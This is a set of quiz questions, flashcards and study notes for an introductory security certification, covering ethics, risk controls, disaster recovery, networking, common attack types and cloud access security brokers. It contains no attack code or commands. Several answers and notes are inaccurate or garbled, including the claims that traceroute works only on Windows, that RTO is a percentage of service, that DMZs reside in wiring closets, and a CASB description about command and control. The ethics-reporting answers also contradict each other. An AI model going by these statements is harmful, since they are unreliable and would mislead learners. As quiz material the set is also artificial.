Ethics, Security & Cloud Access: Review Questions

Questions and Answers

Which of the following parties is generally permitted to file a complaint related to violations of a code of ethics?

• Any professional in a related field, regardless of direct impact.
• Only employers or clients directly affected by the actions in question. (correct)
• Only government regulatory bodies.
• Any member of the public who witnesses a potential violation.

Witnessing a violation of a Code of Ethics is optional to report.

False (B)

What type of attack involves an attacker overwhelming a system with traffic to prevent legitimate users from accessing it?

Denial of Service (DoS)

Building systems with built-in ________ helps protect against service outages by ensuring that another component can take over if one fails.

redundancy

What is the primary risk associated with failing to adhere to software license agreements?

Fines and legal actions. (A)

Using passwords combined with security questions is a valid form of multi-factor authentication.

False (B)

What does protecting data 'entrusted to the organization' primarily refer to?

Protecting client's or user's data. (C)

________ are defined as methods used by attackers to reach their target.

Threat Vectors

A company is considering using a cloud-based service but is concerned about security. What is the primary function of a Cloud Access Security Broker (CASB) in this scenario?

To intercept and monitor traffic between the user and the cloud service for security issues. (A)

A Statement of Work (SOW) takes precedence over a Master Service Agreement (MSA) in the event of conflicting terms.

False (B)

Why is it critical that a one-way hash function produces a unique, fixed-length output, and what security concern arises if this is not the case?

Compromised data integrity; collisions

Creating and verifying a Message Authentication Code (MAC) involves using a secret key in conjunction with a(n) ________ function to ensure data integrity and authenticity.

hash

Match the following security concepts with their descriptions:

Vendor Lock-In = The difficulty of switching to a different vendor due to proprietary technologies or high switching costs. Asymmetric Encryption = Encryption and decryption using a public and private key pair. Social Engineering = Manipulating individuals into divulging confidential information or performing actions detrimental to security. Artificial Intelligence in Security = Utilizing AI to analyze large volumes of security data and automate threat detection.

What is the term for the level of risk present before any control measures are implemented?

Inherent Risk (D)

A newly introduced risk from a control measure should be considered when assessing overall risk.

True (A)

What are procedures and mechanisms that reduce the likelihood or impact of a risk called?

Controls

The risk that remains after controls have been applied is known as ______ risk.

residual

Match the following control purposes with their correct descriptions:

Preventative = Intended to avoid an incident from occurring Detective = Used to identify incidents in progress Corrective = Remedies circumstances to mitigate damage

Which of the following is an example of a detective control mechanism?

Intrusion Detection System (A)

Version control is used to manage configurations but is not helpful for identifying unauthorized changes.

False (B)

What type of documentation can be created to help others visually understand system settings?

Diagrams

A(n) ______ is the default configuration settings set by an organization for a system.

baseline

What is the name of the set of controls designed to keep a business running in the face of adversity?

Business Continuity Plan (B)

Redundancy is a protection against the failure of multiple components.

False (B)

What analysis helps identify and remove single points of failure from a system?

SPOF analysis

An organization's legal team should always be involved to ensure compliance with laws and obligations with ______.

3rd parties

What is the purpose of a Security Information and Event Management (SIEM) system?

To collect system security information, analyze it, and retain it for future use (C)

Disaster recovery sites are solely for technology operations and do not serve as offsite storage locations.

False (B)

Which of the following describes an action performed during a parallel test of a Disaster Recovery Plan?

Activating the Disaster Recovery Environment. (A)

Security at a remote disaster recovery facility is less important than security at the primary data center.

False (B)

What design approach gives principles to design your crime prevention mechanisms that is appropriate with your environmental surroundings?

Crime Prevention Through Environmental Design (CPTED)

The principle that requires agreement of two persons before access to very sensitive functions is granted is known as ______.

two-person control

Which of the following refers to employees rotating job functions for the purpose of diversity and integrity in work?

Job rotation (C)

Role-based access control (RBAC) issues arise when users switch roles, and their previous role's system access is automatically revoked.

False (B)

What is the practice where auditors review documentation to ensure that managers have formally approved each user's account and access permissions called?

Access review

During the off-boarding process, administrators should first ______ accounts before permanent removal to allow reversal if needed.

deactivate

What security benefit does limiting an employee's system access provide?

Protecting against internal risks. (C)

A Local Area Network (LAN) can only connect computers within a single building.

False (B)

What is the primary purpose of technologies like Bluetooth?

To create a wireless connection between a computer and its peripheral devices

Protocols like TCP/IP rely on a set of ______ rules that allow computers to communicate on a network.

standardized

Why is User Datagram Protocol (UDP) well-suited to video and voice applications ?

Every single packet doesn't have to reach the destination for video and voice to be comprehensible. (A)

Network Ports uniquely identifies a system , while an IP address uniquely identifies a location on a system associated with a specific application

False (B)

What type of attack relies on a compromised communication path between a client and a server?

Eavesdropping attack

In a Man-in-the-Middle attack, what is the attacker's primary role?

To act as a relay, viewing and potentially altering communications. (B)

A replay attack involves generating completely new authentication tokens to gain unauthorized access.

False (B)

What type of attack involves exploiting vulnerabilities to cause systems to fail to encrypt data properly, potentially using methods like high-voltage electricity?

Fault Attack

Attackers use __________ to monitor system activity and retrieve information that is actively being encrypted.

footprints

What is the primary goal of measuring the time taken for cryptographic operations in a side-channel attack?

To gain information about the cryptographic process that may be used to undermine security. (D)

An Intrusion Detection System (IDS) or Intrusion Prevention System (IPS) always accurately identifies and prevents all attacks.

False (B)

Why can an Intrusion Detection System (IDS) be considered a single point of failure?

It may disrupt the entire network

A vulnerability scanner maintains a __________ for all known vulnerability exploits to test servers for weaknesses.

database

How do firewalls primarily protect networks?

By dividing networks into security zones. (C)

In a Zero Trust approach, systems are automatically trusted based on their location within the internal network.

False (B)

What is the function of switches in a network?

Central aggregation point for network traffic

What is the purpose of Access Control Lists (ACLs) on network devices?

To limit traffic entering or leaving a network. (A)

A default-deny firewall blocks all traffic unless explicitly allowed by a rule.

True (A)

What is a key feature of Next-Generation Firewalls (NGFWs) that distinguishes them from traditional firewalls?

They evaluate requests based on user identity and application type. (C)

What is the main purpose of using a Virtual Private Network (VPN)?

Create a virtual tunnel between two systems over the internet

Flashcards

Who can file a complaint?

Only employers and clients can file a complaint, or other professionals depending on the complaint.

Reporting Ethics Violations

You are obligated to report any observed violations of the Code of Ethics.

Social Engineering

An attacker uses psychological manipulation to trick employees into divulging information or access.

Denial of Service (DoS)

Overwhelming a system with traffic to prevent legitimate users from accessing it.

System Redundancy

Building systems with redundancy so if one component fails, another takes over.

Passwords + Security Questions

Passwords combined with security questions are NOT multi-factor authentication.

Data Protection

Protecting data that was entrusted to the organization, such as client data.

Threat Vectors

Methods used by attackers to reach their targets, such as social engineering or hacker toolkits.

Cloud Access Security Broker (CASB)

Acts as an intermediary, monitoring traffic between users and cloud services for security issues.

Service Level Agreement (SLA)

Details specific performance expectations a customer has for a vendor's service.

Master Service Agreement (MSA)

Governs terms for additional projects outlined in Statements of Work (SOW).

Hash Function

Transforms variable-length input into a unique, fixed-length output; should be collision-resistant.

Inherent Risk

Risk level before implementing controls.

Residual Risk

Remaining risk after controls are applied.

Introduced Risk

New risk introduced by implemented controls.

Controls

Procedures/mechanisms reducing risk likelihood or impact.

Business Continuity Planning (BCP)

Ensuring business continues during disruptions.

Minimum Service Level

Minimum acceptable service level during a disaster.

Data Backup

Copying data from primary to secondary storage.

Full + Differential Backup Restore

Full backups every Sunday, differential backups weekdays. Restore Sunday full, then latest weekday differential.

Full + Incremental Backup Restore

Full backups every Sunday, incremental backups weekdays. Restore Sunday full, then all incremental backups in order.

Disaster Recovery Site

Secondary location for IT operations during a disaster.

Business Continuity Controls

Controls that keep a business running during adversity.

Security Controls

Controls that keep systems secure.

Redundancy

Protecting against failure of a single component.

Single Point Of Failure (SPOF)

Analyzing for systems with a single-point-of-failure.

Security Information and Event Management (SIEM)

System gathering & analyzing security data for incidents.

Backup Transportation

Physically transporting backups to a recovery site, manually or electronically.

Parallel Test

A live test where the disaster recovery environment runs in parallel with the production environment.

Crime Prevention Through Environmental Design (CPTED)

Designing crime prevention mechanisms that are appropriate for the surrounding environment.

Dual Control

Requires two people to agree before a sensitive action can be performed.

Job Rotation

Rotating employees' responsibilities for diversity and integrity.

Privilege Creep

When users retain access rights from previous roles, violating least privilege.

User Account Management

Creating, updating, and deleting user accounts across applications and systems.

Account Deactivation

Disabling an account before permanent removal, allowing for easy reversal if needed.

Network Address Translation (NAT)

Converting private IP addresses to public IP addresses for internet communication.

Network Protocol

Standardized rules allowing computers to communicate on a network.

Encryption

Hiding the true content of network traffic from unauthorized parties.

Ping

Verifying if a system is present and responding on a network.

Malware

Software that performs unwanted actions once executed.

Botnets

Networks of compromised computers controlled by attackers.

Man-in-the-Middle Attack

An attack where the attacker intercepts communication between two parties.

Replay Attack

Replaying captured network data, like authentication tokens, to gain unauthorized access.

Fault Injection Attack

Causing system failures through methods like high voltage to bypass security measures.

Footprinting Attack

Monitoring system activity to extract information from encrypted data.

Timing Attack

Analyzing the time it takes for cryptographic operations to complete to gain information used to compromise security.

False Positive (IDS/IPS)

Alert triggered when no attack occurred.

False Negative (IDS/IPS)

Failure to alert when an attack is actually taking place.

Next-Generation Firewall (NGFW)

Inspects network traffic, identifies applications, and blocks threats. Performs deep packet inspection.

Firewall Security Zones

Divides networks into security zones with different levels of trust.

Zero Trust Approach

Trusting no device or user by default, regardless of network location.

DMZ (Demilitarized Zone)

Special network segments that are accessible by outside parties.

VLAN Trunking

Switches in different locations on the network to carry the same VLANs

VPN (Virtual Private Network)

A dedicated encrypted network connection built on top of a public network like the Internet.

Network Access Control (NAC)

Verifies system and user authorization before network access is granted.

Cloud Computing

Delivering computing resources over a network, allowing on-demand access to shared resources.

Study Notes

• Only employers and clients can file a complaint due to the code's nature.
• Professionals may file a complaint based on its nature.
• Witnessing a Code of Ethics violation requires reporting.

Social Engineering

• Attackers use psychological manipulation to get employees to reveal information or grant access.
• Attackers intercept network traffic during logins and assume user roles.

Denial of Service (DoS) Attacks

• A system is bombarded with traffic, overwhelming its ability to respond to legitimate users
• Firewalls can block unauthorized connections to protect against DoS attacks.
• Redundancy in systems ensures component failure doesn't cause complete outage

Service Outages

• Programming errors, equipment failure, etc., can cause service outages.
• Resilient systems that withstand errors and hardware failures protect against these outages.

Passwords

• Previously used passwords should not be reused.
• Organizations should facilitate easy password changes, but be wary of reset processes that attackers could exploit.
• Passwords combined with security questions do not constitute multi-factor authentication; both are "something you know."

Data Protection

• Educate users on protecting personal information.
• Protect data entrusted to the organization (e.g., client data).
• Any info that can be tied back to a specific individual

Privacy

• Laws governing information protection depend on reasonable expectation of privacy.
• Uploading a YouTube video means you do not have an expectation of privacy

Security Controls

• Build controls to reduce the likelihood of successful attacks (e.g., multi-factor authentication, social engineering awareness).
• Altered, deleted, or stolen information can significantly damage organizations and customers.
• Software license agreement violations risk fines and legal action.

Threat Vectors

• Threat Vectors are methods attackers use to reach targets (e.g., social engineering, hacker toolkits).

Risk Transfer

• Attempting to shift the impact of risk from your organization to another.
• You can not always transfer the risk completely
• Reputation damage etc.

Risk Assessment

• Inherent risk is the initial risk level before controls.
• Residual risk is the risk remaining after controls are applied.
• Controls can introduce new risks; for example, a firewall mitigates inherent risk but introduces the risk of firewall failure.

Security Controls (Mechanisms and Purpose)

• Controls are procedures that reduce risk likelihood or impact and help identify issues.
• First you must group Controls by their purpose:
• Preventative - Designed to prevent an incident from occurring
• Detective - Designed to detect incidents in progress
• Corrective - Designed to put systems back to normal after an incident has occurred
• Then group them by their Control Mechanism:
• Technical - Achieved through technology (ex: firewall)
• Administrative - Achieved through procedures (ex: background checks, incident response)
• Physical - Achieved through tangible items (ex: security guards, fire suppression system

Configuration Management

• Tracks OS settings and installed software inventory.
• Artifacts (diagrams, legends) help understand system configuration.
• Snapshots assess if settings are outside approved change management processes.

Secure Baseline

• The secure baseline is an organization's default configuration setting

Version Control

• Assigning an incrementing version number to each software release for identification.
• Version numbers are written as three part decimals

Legal and Regulatory Compliance

• Understanding how domestic and international laws apply to an organization is crusial

Password Policies

• Password policies officially document password requirements (length, complexity).

Business Continuity Planning (BCP)

• BCP is a set of controls to keep a business running during adversity.
• BCP involves identifying mission-essential functions and the IT systems supporting them.
• Cloud BCP requires collaboration between providers and customers.

Redundancy

• Refers to the level of protection against failure of a single component
• SPOF (Single Point of Failure) analysis identifies and removes single points of failure.
• SPOF analysis can apply to IT infrastructure, HR management, and vendor reliance.

Fault Tolerance

• Multiple systems protect against service failure (beyond just availability zones).
• Uninterruptible Power Supplies (UPS) provide battery power during outages, sometimes supplemented by a generator.
• Power Distribution Units (PDUs) provide power cleaning and management
• Redundant Array of Inexpensive Disks (RAID) protects against storage device failure.
• Parity blocks in RAID regenerate failed disk content.
• Fault-tolerance mechanisms prevent system failure even with component failures.

Incident Response Communication

• Minimize external communications (media, etc.).
• Decide whether to involve law enforcement, considering potential release of sensitive details.
• Always involve the organization's legal team for compliance.
• Describe how information will be shared within the organization.

SIEM (Security Information and Event Management)

• SIEM collects data from diverse sources, analyzes it for security incidents, and retains it.

External Risk Detection

• External sources (customers) may detect risks before internal systems.
• Incident Response (IR) teams need a consistent method for receiving and evaluating external reports.

Incident Response Phases

• First responders have responsibilities to reduce risk.
• Assessment Mode: Triage/analyze damage and implement permanent recovery.
• Temporary Recovery may precede Permanent Recovery.

Recovery Time Objective (RTO)

• Specifies the percentage of service that must be available during a disaster.

Backups

• Backups provide a fail-safe way to recover data.

Backup Types

• Tape backups periodically copy data to tape cartridges.
• Disk backups write data to special backup disks.
• Backups to Storage Area Networks (SAN) or Network Attached Storage (NAS) also fit in this category.

Backup Restoration Examples

• Full backup Sunday, differential backups weekdays, failure Friday: restore Sunday full and Thursday differential.
• Full backup Sunday, incremental backups weekdays, failure Friday: restore Sunday full and all incremental backups.

Disaster Recovery Sites

• Used to restore operations eventually, but requires a significant amount of time
• Disaster recovery sites provide facilities for technology operations and offsite storage
• Mobile disaster recovery is called "Wheels" allowing backups to be physically transported to the disaster recovery facility either manually or electronically

Disaster Recovery Testing

• A change of an organization's business protocols to match the current Disaster Recovery Plan
• Tabletop Exercise: Asks each team member to review their role in the disaster recovery process and provide feedback
• Walkthrough: Gathers the team together for a formal review of the disaster recovery plan
• Parallel Test: Activates the Disaster Recovery Environment

Perimeter Security

• Remote locations of data centers require as much security as the centers themselves.
• Sensitive security must be protected as it offers access to digital eavesdroppers and network intruders
• Crime Prevention Through Environmental Design (CPTED) principles design crime prevention mechanisms based on surroundings.

Environmental Design

• Security design should allow for observation of the facility's natural surroundings.
• Clearly mark areas closed to the public.

Dual Control

• Dual control requires two people to authorize sensitive functions.

Job Rotation

• Job rotation involves rotating job functions for diversity and integrity.

Role-Based Access Control

• Ensures employees moving to different roles have appropriate access.

Access Creep

• Wrong permissions assigned that results in too little access to do their job or too much access (violates least privilege)
• Occurs when users switch roles and their previous role's access is not revoked.

Account Reviews

• Auditors check documentation to ensure managers approved user accounts and access permissions.
• Account management involves creating, updating, and deleting user accounts.
• Deactivate the account first before permanent removal as it can be reversed
• During off-boarding, administrators disable accounts and revoke authorizations.

Principle of Least Privilege

• Protects against internal and external risks by limiting damage potential to the stolen privileges

Local Area Networks (LAN)

• Can connect computers within an office (LAN) or to the global internet
• Connecting a physical Ethernet cable to an internet jack behind the ball

Wireless Communication

• Wireless communication creates a wireless connection between computers and peripheral devices

Protocols

• A set of standardized rules that allow computers to communicate on a network such as the internet

User Datagram Protocol (UDP)

• Systems send each other blindly with no essential guaranteed delivery
• Not every packet is required to reach the destination for voice or video

Internet Protocol (IP)

• Allows traffic delivery between any two systems with an addressing scheme
• IP addresses uniquely identify system while network ports uniquely identify a particular location on the system associated with a specific application

DNS (Domain Name System)

• Ensures everyone knows how to find common services

Encryption

• Hides the true content of network traffic from those without the decryption key

Ephemeral Key

• Changes encryption key for each packet preventing attackers from monitoring for a long period of time

Simultaneous Authentication of Equals (SAE)

• A secure key exchange protocol based upon the Diffie-Hellman Technique, to provide more secure initial setup of encrypted wireless communications

Ping Tests

• If you receive a response : it is not a network issue and a local web server issue : if that responds : this will tell you your internet is successful and the issue is with the web server or network connection
• if you ping many systems on internet and there is no response, it is likely that the problem is on your end
• you can ping a system on your Local Network : if that responds, there's probably an issue with your network's connection to the internet
• if a Local Network does not respond : Either your Local network is down or there is a problem with your computer
• Last Resort : Repeat process on another computer

Traceroute

• Allows you to interrogate a system to see if it is present on the network
• If you want to know how packets are traveling today from my system located in Toronto to a LinkedIn. com webserver, wherever that is located
• Works only on Windows

Malware

• Might steal information, damage data or disrupt normal use of the system
• Opening email attachments, clicking links, or inserting an infected USB can spread Malware

Worms

• When a worm infects a system, it will use it as it's base for spreading to other parts of the Local Area Network
• Worms spread because the systems are vulnerable

Trojan Horse

• When you run the software, it may perform as expected however will have unexpected/malicious function

Application Controls

• Limit software that can run on system to titles and versions

Botnets

• Once malware takes control of a system(hacker gains control), he or she joins/adds it to the preconceived botnet
• Hackers command botnets through Command and Control Networks as they relay orders
• High redundancy needed because security analysts will shut them down one by one
• In a cat and mouse game, its whoever controls the Command and Control channels that retains control of the Botnet for the longest

Eavesdropping Attacks

• Rely on a compromised communication path between a client and a Server

Man-In-The-Middle Attacks (MITM)

• Hackers may use the Man-in-the-Middle technique to trick the user to connect to the attacker directly, then the attacker directly connects to the server.
• Original user logs into attacker's fake server while attacker relays communication.
• User unaware of attacker intercepting communications.
• Exploit flaws in browsers and browser plugins to gain access to web communications
• If the attacker is able to control the network traffic, they may be able to conduct a Reply Attack

Replay Attack

• Uses previously captured data, such as an encrypted authentication token, to create a separate connection to the server

Side-Channel Attacks

• Hacker exploits vulnerability to view a user's encrypted web communication
• High-voltage electricity can cause malfunctions undermining security.
• Failures of security may cause systems to fail to encrypt data property.
• Attackers use footprints monitor system activity and to retrieve information that is actively being encrypted
• An attacker captures electromagnetic radiation from a cryptographic system to determine plaintext information.
• Attackers precisely measure how long cryptographic operations take to complete, gaining information that may be used to undermine security

IDS/IPS Systems (False positives)

• triggers an alert when an attack did not actually take place

IDS/IPS Systems (False negatives)

• Fails to trigger an alert when an actual attack occurs

Network Taps

• Risk : It is a single point of failure so it may disrupt the entire network
• Its a listening platform that allows it to receivecopies all traffic sent through the network to scan
• Cannot pre-detect as it can only know its existence once it enters the network

Advanced Malware Protection

• Use Port Scanning Mechanisms
• Scans deeper than Port Scanner, actually looks at what services are using those ports
• Has a database for all known vulnerability exploits and tests server to see if it contains any of those vulnerabilities

Fire Suppression Systems

• Contain water in the pipes ready to deploy when a fire strikes

Network Segmentation

• Firewalls divide networks into security zones to protect systems of differing security models
• Systems that accept outside connections (mail, web servers) can be placed in these zones.
• Zero Trust Approach : Systems do not gain any trust based solely upon their network location

DMZ (Demilitarized Zone)

• Special intranet segments that are accessible by outside parties like business partners
• Reside in wiring closets and connect the computers in a building together

Switches

• Ethernet jacks are at the other end of network cables connected to switches
• Serves as a central aggregation point for network traffic heading to or from a large network
• Makes best path decisions for traffic to follow

Access Control Lists (ACLs)

• Used to limit some traffic that are entering or leaving a network, this type of filtering does not pay attention to Connection states and are called stateless firewalls.

Virtual LANs (VLAN)

• Users on the same VLAN can directly contact each other as if they were connected to the same switch
• Reduce security risk by limiting communication between unrelated systems.
• Trunking allows switches at different locations to carry the same VLANs

Implicit Deny Rule

• If the firewall receives traffic not explicitly allowed by a firewall rule, then that traffic must be blocked
• Basically saying, if you don't have a passcard, you cannot get in as the door is always closed

Next-Generation Firewalls (NGFW)

• The Newest type of Firewalls are called New Generation Firewalls (NGFW)
• Evaluate requests based on identity of user, nature of application, time of day etc.

Web Application Firewalls (WAF)

• Understands how HTTP protocol works and dive deep into those application connections, looking for signs of SQL Injection, Cross-site scripting, and other web application attacks

Virtual Private Networks (VPN)

• Works by using encryption to create a virtual tunnel between two system over the internet
• Everything on one tunnel is encrypted and decrypted when it exits

Full Tunnel

• All network traffic leaving the connected device is routed through the VPN tunnel, regardless of final destination

Split Tunnel

• Only traffic destined for the corporate network is sent through the VPN tunnel

Network Access Control (NAC)

• Intercepts network traffic coming from unknown devices and verifies that the system and users are authorized before allowing further communication

802.1x Authentication Flow

• Supplicant(Sends credentials) → Authenticator(Receives and passes it to AS) → Authenticator Server (authenticates and sends results to authenticator → Authenticator → Supplicant → Access
• Once authenticator learns the identity of requested user it places the user in the network based upon that user's identity
• It will be placed into a quarantine VLAN where they will have limited internet access and no access to internal resources

Posture Assessment

• Is done through an Agent or Agentless

Cloud Access Security Broker (CASB)

• Connects back to cloud services for command and control, creating a pathway for external attackers - isolating network to a isolated section where they will not have access to trusted networks

Cloud Computing

• Delivering computing resources to a remote customer over a network
• A model for enabling ubiquitous, convenient, on-demand network access to shared pool of configurable computing resources (networks, servers, storage, applications, services) that can be rapidly provisioned and released with menial management effort or service provider interaction
• No cloud model is inherently superior to other approaches. It all depends on context

Cloud Security Broker

• Add a third-party security layer to the interactions that users have with other cloud
• Broker intercepts traffic between the user and the cloud service, monitoring for security issues
• Broker may not be able to block requests, depending upon API capabilities

Vendor Security

• Ensure that vendor security policies are at least as stringent as your own
• Vendor lock-in makes it difficult to switch vendors down the road. So be careful

Service Level Agreements (SLA)

• Document specific requirements that a customer has about any aspect of a vendor's service performance
• Commonly used when a legal dispute is unlikely but customer and vendor wish to document their relationship to avoid future misunderstanding
• Usually used when a department another company is dealing with another department

Statement of Work (SOW)

• Statement of Work (SOW) is used when another project comes up
• SOW is governed by terms in MSA. SOW is like am abeyance or patch

Asymmetric Encryption

• Keys used for Asymmetric encryption and decryption (public & private) must be from the same pair

Hash Functions

• One-way function that transforms a variable length input into a unique, fixed-length output
• Output of a hash function will always be same length regardless of input size
• No two inputs to a hash function should produce the same output
• All criterias above must be met to have an effective Hash Function
• You must which functions are considered insecure and which remain secure

Message Authentication Code (MAC)

• Create and verify message authentication code by using a secret key in conjunction with a hash function

AI in Security

• Logging data for a company can be overwhelming, Artificial Intelligence can help solve security data overload.
• Firewall log
• Web server log
• Database log
• Router log

Social Engineering Awareness

• Manipulating people into divulging information or performing an action that undermines security.
• Provides users with the knowledge they need to protect the organization's security

Description

Test your knowledge of ethics violations, security protocols like multi-factor authentication, and the importance of adhering to software licensing agreements. Also covers attack methods and cloud security, with a focus on Cloud Access Security Brokers (CASB).